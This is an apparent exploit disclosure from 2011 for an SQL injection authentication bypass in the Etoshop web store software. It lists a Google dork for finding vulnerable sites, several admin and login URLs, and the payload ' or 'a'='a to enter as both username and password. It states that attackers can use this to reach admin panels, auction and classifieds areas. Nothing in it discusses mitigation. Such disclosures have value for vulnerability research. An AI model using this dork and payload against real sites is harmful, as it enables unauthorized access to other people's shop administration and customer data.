Etoshop suffers from a remote SQL injection vulnerability that allows for authentication bypass.
05782e686890fe28d39710b551522e86e7011f50590b8d01ec9911fff61ab20b
%+
$.......#........4.........|)........0............\/\/ %+
%+
%+
%++++++++++++++++++++++++++++++++++++++++
# Exploit Title: Etoshop(Auth Bypass) SQLi Vulnerability
# Vendor: http://www.etoshop.com
# Date: 12th july,2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)
# Google Dork: ©2000 INNER ESTEEM SDN BHD
*****************************************************************************************************************************************
*****************************************************************************************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.etoshop.com/demo/pcstore/admin.asp
http://www.etoshop.com/demo/sbd-login.asp
http://www.etoshop.com/demo/cac-login.asp
http://www.etoshop.com/demo/csf-login.asp
EXPLOIT:
Username: ' or 'a'='a
Password: ' or 'a'='a
Observe: Attackers can use Authentication Bypass to get into Admin
Panel,storebuilder,c2c auction,classifieds in the site.
********************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
********************************************************************************************************************************************